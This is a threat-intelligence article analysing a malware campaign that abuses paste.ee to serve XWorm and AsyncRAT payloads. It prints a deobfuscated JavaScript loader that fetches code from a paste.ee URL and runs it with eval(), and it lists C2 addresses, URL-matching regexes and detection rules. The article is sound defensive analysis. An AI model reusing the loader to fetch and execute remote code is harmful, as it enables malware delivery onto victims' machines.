.webp?w=696&resize=696,0&ssl=1 "Paste.ee Misused")
A recent investigation by cybersecurity researchers has revealed a highly stealthy malware distribution campaign abusing the legitimate paste.ee service as a command-and-control (C&C) hub.
The attackers use advanced obfuscation techniques in JavaScript droppers to deliver powerful remote access trojans (RATs) like XWorm and AsyncRAT, evading conventional security detection and complicating incident response efforts.
Obfuscated JavaScript Loader:
The attack chain begins with the distribution of weaponized JavaScript files. One such sample, disguised as “DOCUMENT FOR DELIVERY INFORMATION.js”, was uploaded to malware repositories and flagged due to behavioral markers reminiscent of RemcosRAT.
Obfuscation Mechanisms:
- Junk Unicode Insertion: The JavaScript loader inserts rare Unicode characters (such as
ᙓೇᰖ∛ᩕዀ╬ᤳK⨀Ḣڑ⦝〒) throughout its strings and logic, making static analysis and detection challenging. - String Reconstruction: These characters are removed at runtime to reconstruct key object names and URLs.
Network Communication:
- The dropper dynamically constructs a call to the
MSXML2.XMLHTTPActiveX object, initiating an HTTP GET request to an obfuscated paste.ee URL (e.g.,http://paste.ee/d/s1uVin8i/0). - The retrieved payload, typically more malicious code, is then executed via the JavaScript
Functionconstructor.
Deobfuscated Loader Sample:
javascript// Pseudocode summary after removing junk Unicode and decoding logic
var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlhttp.open("GET", "http://paste.ee/d/s1uVin8i/0", false);
xmlhttp.send();
eval(xmlhttp.responseText);
This loader model enables the adversary to swap payloads on demand simply by updating the paste at paste.ee—without altering the delivery infrastructure or initial dropper.
Infrastructure Analysis: From Paste.ee to RAT Command-and-Control
Malicious Paste.ee Usage
Researchers mapped a network of paste.ee URLs distributing encoded PE files, obfuscated scripts, and configuration data. Regex-based hunting revealed consistent patterns in malicious paste URLs (e.g., https:\/\/paste\.ee\/[a-z]\/[A-Za-z0-9]+\/0$), allowing defenders to programmatically extract and track related campaigns.
Extraction and Verification Process:
- Pulling URLs from NDJSON:bash
jq -r ".url" export.ndjson > urls.txt - Verifying Live Targets:bash
httpx -l urls.txt -mc 200 -o 200urls.txt - Malware Retrieval and Analysis:
- Extracted PE files showed reverse encoding and encryption.
- Decompilation and config decryption revealed XWorm activity and C2 details.
Command-and-Control (C2) Infrastructure
On decoding configuration data, primary C2 domains such as abuwire123[.]ddns[.]net emerged, resolving to IPs like 45.145.43.244 (Frankfurt, Germany, ASN: AS58212). The C2 network was found to span both Europe and the U.S., with notable async tunnels:
| IP Address | Ports | Service | Certificate Label | First Seen |
|---|---|---|---|---|
| 45.145.43.244 | 6606 | XWorm C2 | AsyncRAT | Feb 24, 2025 |
| 66.63.187.154 | 6606 | AsyncRAT C2 | AsyncRAT | Feb 2025 |
| 66.63.187.232 | 8808 | XWorm C2 | AsyncRAT | Feb 2025 |
| 196.251.118.41 | 8808 | AsyncRAT C2 | AsyncRAT | Feb 2025 |
Technical Capabilities of XWorm:
- Keylogging and Data Exfiltration: XWorm captures keystrokes system-wide, logs sensitive data, and exfiltrates it via AES-encrypted C2 channels.
- Persistence and Recon: It sends periodic PINGs containing user, system, and window information to ensure connectivity and enable surveillance.
AsyncRAT Characteristics:
- An open-source C# RAT, forked and customized by numerous threat actors.
- Supports robust backdoor access, live monitoring, file theft, and lateral movement.
Threat Indicators and Mitigation Strategies
Indicators of Compromise (IOCs)
| IP Address | Domain | Hosting Company | Location |
|---|---|---|---|
| 45.145.43.244 | abuwire123[.]ddns[.]net | dataforest GmbH (ASN: AS58212) | Frankfurt, Germany |
| 66.63.187.154 | Not Available | QuadraNet Enterprises LLC | United States |
| 66.63.187.232 | abuwire123h[.]ddns[.]net abuwire123[.]duckdns[.]org | QuadraNet Enterprises LLC | United States |
| 196.251.118.41 | Not Available | Not Available | Not Available |
| 23.186.113.60 | paste.ee | Not Available | Not Available |
Defensive Measures
- Block Paste Patterns: Proactively block paste.ee URLs matching known malicious regex patterns.
- Monitor Ports: Flag or restrict outbound connections to non-standard ports 6606, 7707, 8808.
- Behavioral Detection: Alert on processes invoking ActiveX XMLHTTP calls in scripts and on highly obfuscated JavaScript in user directories.
- Update and Audit: Ensure endpoint security solutions can flag suspicious scripts even if not known malware and regularly audit for network connections to IOCs.
The innovative misuse of paste.ee as a rapidly updatable C&C hub, combined with sophisticated JavaScript obfuscation and a dispersed C2 infrastructure, demonstrates the evolving tactics of modern malware actors. XWorm and AsyncRAT remain potent threats, and defenders must adapt with multi-layered detection and robust network hygiene.
.webp?resize=1600,900&ssl=1&description=Paste.ee Misused - A recent investigation by cybersecurity researchers has revealed a highly stealthy malware distribution campaign abusing.){kind=link}